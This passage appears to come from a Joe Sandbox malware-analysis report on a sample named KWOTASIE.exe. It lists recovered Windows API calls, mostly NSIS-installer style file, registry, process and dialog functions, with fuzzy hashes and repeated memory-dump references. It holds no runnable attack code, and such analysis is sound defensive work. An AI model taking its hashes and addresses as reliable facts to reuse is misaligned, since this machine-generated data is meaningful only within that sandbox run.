              • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
              • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
              APIs
              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
              • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
              • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
              APIs
              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
              • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
              • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
              APIs
              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: PrivateProfileString
              • String ID:
              • API String ID: 1096422788-0
              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
              APIs
              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,Remove folder: ,?), ref: 004060DD
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
              • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
              • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
              APIs
              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 1bd4d2410b569f87dce378e8f9561a84c12a3ebb813fa83cf21d9345b916f26c
              • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
              • Opcode Fuzzy Hash: 1bd4d2410b569f87dce378e8f9561a84c12a3ebb813fa83cf21d9345b916f26c
              • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
              APIs
              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
              • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
              • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
              APIs
              • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
              APIs
              • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CallbackDispatcherUser
              • String ID:
              • API String ID: 2492992576-0
              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
              APIs
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,00403233), ref: 0040530B
                • Part of subcall function 004052B0: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\), ref: 0040531D
                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
              • String ID:
              • API String ID: 2972824698-0
              • Opcode ID: dc9a5ee313f0edd564a484b62bba3d4dd2351bb93fec450803f9676c8a93a235
              • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
              • Opcode Fuzzy Hash: dc9a5ee313f0edd564a484b62bba3d4dd2351bb93fec450803f9676c8a93a235
              • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
              APIs
              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
              • LoadBitmapW.USER32(0000006E), ref: 00404CAC
              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
              • DeleteObject.GDI32(00000000), ref: 00404D22
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
              • ShowWindow.USER32(?,00000005), ref: 00404E7C
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
              • GlobalFree.KERNEL32(?), ref: 0040505C
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
              • ShowWindow.USER32(?,00000000), ref: 004051FB
              • GetDlgItem.USER32(?,000003FE), ref: 00405206
              • ShowWindow.USER32(00000000), ref: 0040520D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 1638840714-813528018
              • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
              • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
              APIs
              • GetDlgItem.USER32(?,000003FB), ref: 004046FF
              • SetWindowTextW.USER32(00000000,?), ref: 00404729
              • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
              • CoTaskMemFree.OLE32(00000000), ref: 004047E5
              • lstrcmpiW.KERNEL32(Remove folder: ,004236E8,00000000,?,?), ref: 00404817
              • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404823
              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
